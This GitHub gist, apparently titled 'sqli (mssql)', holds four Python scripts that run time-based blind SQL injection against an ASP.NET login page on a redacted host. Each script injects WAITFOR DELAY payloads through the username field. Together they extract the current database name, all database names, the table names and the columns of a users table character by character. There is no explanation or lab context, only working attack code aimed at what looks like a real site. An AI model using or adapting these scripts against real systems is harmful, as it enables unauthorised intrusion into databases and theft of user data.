Skip to content

Instantly share code, notes, and snippets.

@sharpicx

sharpicx/cols.py

Last active December 21, 2025 08:41
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save sharpicx/6ac0c8b042f281dd9dea9030b06a76e1 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save sharpicx/6ac0c8b042f281dd9dea9030b06a76e1 to your computer and use it in GitHub Desktop.
Download ZIP
sqli (mssql)
Raw
cols.py
import requests, time, string
URL = "http://redacted.com/login.aspx"
charsets = string.ascii_letters + string.digits + "_-$" # https://dev.mysql.com/doc/refman/8.4/en/identifiers.html
burp0_headers = {
"Cache-Control": "max-age=0",
"Accept-Language": "en-US,en;q=0.9",
"Origin": "http://redacted.com",
"Content-Type": "application/x-www-form-urlencoded",
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
"Referer": "http://redacted.com/login.aspx",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
}
def send(payload):
data = {
"__VIEWSTATE": "/wEPDwUKMjA3MTgxMTM4N2RkL7UlJbQLRVEHtdBd2cHsgmzduFNoWHiXrVGu0cD9+jc=",
"__VIEWSTATEGENERATOR": "C2EE9ABB",
"__EVENTVALIDATION": "/wEdAATHRQHJ3fxgbABeqXLtYnwsG8sL8VA5/m7gZ949JdB2tEE+RwHRw9AX2/IZO4gVaaKVeG6rrLts0M7XT7lmdcb6vZhOhYNI15ms6KxT68HdWaGxCBK67o39S7upoRJaNfM=",
"redacted$redacted$redactedusername": "admin" + payload,
"redacted$redacted$redactedpassword": "admin",
"redacted$redacted$redactedbutton": "Login",
}
start = time.time()
requests.post(URL, headers=burp0_headers, data=data)
return time.time() - start
col_index = 0
while True:
extracted = ""
pos = 1
found_any = False
while True:
found_char = False
for c in charsets:
payload = (
f"'; IF (SELECT SUBSTRING(name,{pos},1) "
f"FROM [webapp].sys.columns " # [dbname].sys.columns
f"WHERE object_id = OBJECT_ID('[webapp].dbo.users') " # [dbname].dbo.column_name
f"ORDER BY name "
f"OFFSET {col_index} ROWS FETCH NEXT 1 ROWS ONLY)='{c}' "
f"WAITFOR DELAY '0:0:10'--"
)
if send(payload) > 9:
extracted += c
pos += 1
found_char = True
found_any = True
print(f"[col {col_index}] {extracted}")
break
if not found_char:
break
if not found_any:
break
col_index += 1
Raw
current_database.py
import requests, time, string
URL = "http://redacted.com/login.aspx"
charsets = string.digits + string.ascii_letters + "_-$" # https://dev.mysql.com/doc/refman/8.4/en/identifiers.html
burp0_headers = {
"Cache-Control": "max-age=0",
"Accept-Language": "en-US,en;q=0.9",
"Origin": "http://redacted.com",
"Content-Type": "application/x-www-form-urlencoded",
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
"Referer": "http://redacted.com/login.aspx",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
}
i = 1
extracted_char = ""
stop = False
while True:
found = False
for char in charsets:
payload = f"'; IF (SELECT substring(db_name(),{i},1))='{char}' WAITFOR DELAY '0:0:10'--"
burp0_data = {
"__VIEWSTATE": "/wEPDwUKMjA3MTgxMTM4N2RkL7UlJbQLRVEHtdBd2cHsgmzduFNoWHiXrVGu0cD9+jc=",
"__VIEWSTATEGENERATOR": "C2EE9ABB",
"__EVENTVALIDATION": "/wEdAATHRQHJ3fxgbABeqXLtYnwsG8sL8VA5/m7gZ949JdB2tEE+RwHRw9AX2/IZO4gVaaKVeG6rrLts0M7XT7lmdcb6vZhOhYNI15ms6KxT68HdWaGxCBK67o39S7upoRJaNfM=",
"redacted$redacted$redactedusername": "admin" + payload,
"redacted$redacted$redactedpassword": "admin",
"redacted$redacted$redactedbutton": "Login",
}
start = time.time()
res = requests.post(URL, headers=burp0_headers, data=burp0_data)
if time.time() - start > 9:
extracted_char += char
print(f"pos {i}: {extracted_char}")
i += 1
found = True
break
elif 'System.Data.SqlClient.SqlException (0x80131904)' in res.text:
print(f'hello, {i}, {char}, {res.text}')
stop = True
break
if not found:
i += 1
break
if stop:
break
Raw
databases.py
import requests, time, string
URL = "http://redacted.com/login.aspx"
charsets = string.ascii_letters + string.digits + "_-$" # https://dev.mysql.com/doc/refman/8.4/en/identifiers.html
burp0_headers = {
"Cache-Control": "max-age=0",
"Accept-Language": "en-US,en;q=0.9",
"Origin": "http://redacted.com",
"Content-Type": "application/x-www-form-urlencoded",
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
"Referer": "http://redacted.com/login.aspx",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
}
def send(payload):
data = {
"__VIEWSTATE": "/wEPDwUKMjA3MTgxMTM4N2RkL7UlJbQLRVEHtdBd2cHsgmzduFNoWHiXrVGu0cD9+jc=",
"__VIEWSTATEGENERATOR": "C2EE9ABB",
"__EVENTVALIDATION": "/wEdAATHRQHJ3fxgbABeqXLtYnwsG8sL8VA5/m7gZ949JdB2tEE+RwHRw9AX2/IZO4gVaaKVeG6rrLts0M7XT7lmdcb6vZhOhYNI15ms6KxT68HdWaGxCBK67o39S7upoRJaNfM=",
"redacted$redacted$redactedusername": "admin" + payload,
"redacted$redacted$redactedpassword": "admin",
"redacted$redacted$redactedbutton": "Login",
}
start = time.time()
requests.post(URL, headers=burp0_headers, data=data)
return time.time() - start
db_index = 0
while True:
extracted = ""
pos = 1
found_any = False
while True:
found_char = False
for c in charsets:
payload = (
f"'; IF (SELECT SUBSTRING(name,{pos},1) "
f"FROM sys.databases "
f"ORDER BY name "
f"OFFSET {db_index} ROWS FETCH NEXT 1 ROWS ONLY)='{c}' "
f"WAITFOR DELAY '0:0:10'--"
)
if send(payload) > 9:
extracted += c
pos += 1
found_char = True
found_any = True
print(f"[db {db_index}] {extracted}")
break
if not found_char:
break
if not found_any:
break
db_index += 1
Raw
tables.py
import requests, time, string
URL = "http://redacted.com/login.aspx"
charsets = string.ascii_letters + string.digits + "_-$" # https://dev.mysql.com/doc/refman/8.4/en/identifiers.html
burp0_headers = {
"Cache-Control": "max-age=0",
"Accept-Language": "en-US,en;q=0.9",
"Origin": "http://redacted.com",
"Content-Type": "application/x-www-form-urlencoded",
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
"Referer": "http://redacted.com/login.aspx",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
}
def send(payload):
data = {
"__VIEWSTATE": "/wEPDwUKMjA3MTgxMTM4N2RkL7UlJbQLRVEHtdBd2cHsgmzduFNoWHiXrVGu0cD9+jc=",
"__VIEWSTATEGENERATOR": "C2EE9ABB",
"__EVENTVALIDATION": "/wEdAATHRQHJ3fxgbABeqXLtYnwsG8sL8VA5/m7gZ949JdB2tEE+RwHRw9AX2/IZO4gVaaKVeG6rrLts0M7XT7lmdcb6vZhOhYNI15ms6KxT68HdWaGxCBK67o39S7upoRJaNfM=",
"redacted$redacted$redactedusername": "admin" + payload,
"redacted$redacted$redactedpassword": "admin",
"redacted$redacted$redactedbutton": "Login",
}
start = time.time()
requests.post(URL, headers=burp0_headers, data=data)
return time.time() - start
table_index = 0
while True:
extracted = ""
pos = 1
found_any = False
while True:
found_char = False
for c in charsets:
payload = (
f"'; IF (SELECT SUBSTRING(name,{pos},1) "
f"FROM [webapp].sys.tables " # dbname
f"ORDER BY name "
f"OFFSET {table_index} ROWS FETCH NEXT 1 ROWS ONLY)='{c}' "
f"WAITFOR DELAY '0:0:10'--"
)
if send(payload) > 9:
extracted += c
pos += 1
found_char = True
found_any = True
print(f"[table {table_index}] {extracted}")
break
if not found_char:
break
if not found_any:
break
table_index += 1
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment